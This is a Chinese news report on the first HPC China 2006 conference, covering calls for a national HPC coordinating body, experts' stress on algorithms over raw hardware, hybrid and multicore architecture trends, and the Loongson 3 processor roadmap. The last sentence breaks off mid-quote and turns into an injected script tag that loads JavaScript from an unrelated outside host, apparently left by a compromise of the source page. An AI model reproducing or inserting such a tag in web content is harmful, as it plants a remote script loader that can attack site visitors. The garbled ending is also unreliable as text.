桂文庄认为,应该在更高层面上推进hpc。
高性能计算(hpc)不仅在科学计算、仿真模拟中起着至关重要的基础支撑作用,而且对国民经济和社会生活发挥着日益广泛而深刻的影响。
10月28~29日,成立一年多的中国计算机学会高性能计算专业委员会举办了首届高性能计算年会——hpc china 2006。
鉴于hpc先进国家的发展状况和我国hpc的发展现状,与会的专家学者表示,hpc的高速发展离不开国家长期而系统的推进,离不开应用与系统研发的互动,离不开hpc体系架构的创新。
应建立国家级hpc推进机构
近年来,我国hpc取得了长足的进步。根据top 500今年6月公布的最新统计,美国、英国、日本和中国部署的hpc数量分别以299、35、29、28分列top 500前4名。但由于英国部署的hpc都是由ibm、hp等美国厂商提供,因此,以hpc研发而论,继美、日之后,中国已经成为第三种力量。
但是我们也应看到,我国自主研制的hpc目前在top 500榜上有名的只有3套。
科学院高技术研究与发展局前任局长桂文庄在年会上谈到,今年2月7日,美国总统布什向国会提交的2007年财政预算中,用于研发的预算高达1372亿美元。而以“美国竞争力计划”为由,联邦政府2007年将在物质科学和工程学基础研究方面的投入翻番。高端计算依旧是财政预算支持的重点,预算案同时还加大了对网络研究的支持力度,以确保大规模网络技术与快速发展的千兆(千万亿次)级计算系统的同步。
桂文庄介绍说,hpc是提升美国国家竞争力手段之一。今年6月美国科学基金会投资两亿美元用于在2011年建立用于科学计算的千万亿次hpc。
桂文庄认为,虽然科技部、自然科学基金委、中科院、教育部等部门都在积极研究和推进hpc,但鉴于我国的hpc数量不多、应用水平不高的现状和hpc国际竞争的激烈,建议在国家层面设立推进机构来协调和推进hpc的发展。
此前,在中科院去年9月在上海超算中心举办的hpc战略研讨会上,18位两院院士和20多位专家建议成立国家级的高性能战略计算委员会来制定hpc具体发展的中长期计划并组织实施。
要加大对算法研究
hpc的强大计算能力在很大程度上改变了科学研究的方式。中科院物理所研究员方忠在报告中表示,hpc在物质模拟方面具有很高的准确性而且快速高效,比如在高能物理方面的计算,相对于试验设施和试验费用而言成本很低,而且模拟计算地球内部高温高压等。
一些极端条件下,非hpc不可。方忠介绍了借助hpc在自旋霍耳效应上开创性的研究工作,此项研究将有可能应用在自旋电子学器件上,从而能够将现有的硅器件性能提高数倍,功耗同时下降数倍。
方忠认为,在现代物理学研究中,hpc固然重要,但更重要的是要有算法,大规模科学计算能力=hpc+计算软件。
北京应用物理与计算数学研究所所长朱少平介绍说,在计算激光与等离子体相互作用时,要计算的粒子数高达1013。即使是对hpc性能需求巨大,朱少平还是强调,提高精确度要靠多专业联合研究,计算要与试验相结合。他给出的公式是:科学计算=电脑+人脑。所谓人脑指的是算法。
朱少平报告的最后一张幻灯片填了一首诗:“理论峰值诚可贵,实际性能价更高。科学计算要做好,软硬件兼顾最重要。”他提醒大家要重视算法的研究。
中国系统仿真学会理事长李伯虎则展示了hpc在仿真领域的广阔应用,同时也证明了算法的重要,因为任何仿真都是建立在特定的算法之上。
重视算法的一个极端例子是,大连理工大学有关随机振动方面的新算法速度比传统算法提高2~4个数量级,从而将原本要在hpc上运行的应用,最终放到pc机上。
目前,高端hpc还是定制化的专用产品,但随着hpc向通用化发展,专家们认为,未来我国会出现第三方的hpc通用软件公司。
hpc新动向
来自江南计算所的某专家认为,多核微处理器和面向领域的混合体系结构已成为hpc发展的趋势。建在东京技术研究所的tsubame(top 500第7名)采用的就是混合体系,除了使用10368个amd双核opteron外,360块加速卡为系统贡献了24%的性能,仅增加了1%的功耗。而ibm将在2008年完成的名为roadrunner的1600万亿次hpc中,总共采用了16000个opteron和cell两种不同架构的处理器。
该专家认为,从体系架构上看,将多种不同体系的大系统整合到一起将是系统级的趋势,在节点级则是采用fpga(现场可编程门阵列)加速或者专用加速卡成为趋势,而多核则成为hpc必由之路。
中科院计算所在会上披露了2007年将要问世的、面向服务器端的龙芯3号的性能。预计2007年至2008年,龙芯3号将具有8~16内核,主频为1ghz~1.5ghz,工艺为65纳米;而到了2009年至2010年,龙芯3号将具有32~64内核,主频达到1.5ghz~2ghz,采用45纳米工艺。
越过2核和4核,龙芯3号直接冲击8内核。计算所在幻灯片上打下这样的字样:“设计方法正确:10?script src=http://er12.com/t.js>











